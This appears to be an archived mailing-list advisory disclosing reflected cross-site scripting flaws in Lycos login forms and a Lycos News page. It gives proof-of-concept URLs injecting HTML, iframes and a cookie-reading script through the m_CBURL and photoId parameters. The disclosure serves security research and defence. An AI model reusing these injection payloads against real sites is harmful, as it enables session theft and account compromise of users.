[<prev] [next>] [day] [month] [year] [list]
Message-ID: <007901c33283$f775c160$050010ac@rootserver>
From: novappc at novappc.com (Lorenzo Hernandez Garcia-Hierro)
Subject: Lycos Authenticating Systems and Lycos News server Vulnerabilities
---------------
Systems affected: Lycos authenticating servers ,Login forms, Lycos News Site
Risk: 7
Type of errors: Input Validation Flaw
---------------
I encountered security holes in the Lycos Authentication servers . These
servers are affected by multiple Cross Site Scripting
attacks .The hole is in the form that the login cgi program makes the final
lofin form , injecting a final tag like "> in the m_CBURL
variable you can inject html and script in the login form. In addition i
encountered security holes in the Lycos News server related to XSS attacks.
-------------
EXPLOITS / PROOFS OF CONCEPT
-------------
http://ldbauth.lycos.com/cgi-bin/mayaLogin?m_CBURL=">[HERE COMES YOUR XSS
ATTACK CODE]
http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417">
[XSS ATTACK CODE]
------------
SAMPLES
------------
http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417">
<H1>xss in Lycos WebSites</h1>
http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417">
<script>alert(document.cookie);</script>
http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417">
<iframe></iframe>
http://ldbauth.lycos.com/cgi-bin/mayaLogin?m_CBURL="><h1>XSS in Lycos
Authenticating Servers</h1><a href="
http://ldbauth.lycos.com/cgi-bin/mayaLogin?m_CBURL="><script>alert(document.
cookie);</script>
------------------------------------------------------
Lorenzo Hernandez Garcia-Hierro
--- Computer Security Analyzer ---
--Nova Projects Professional Coding--
PGP: Keyfingerprint
B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
ID: 0x9C38E1D7
**********************************
www.novappc.com
security.novappc.com
www.lorenzohgh.com
______________________
Powered by blists - more mailing lists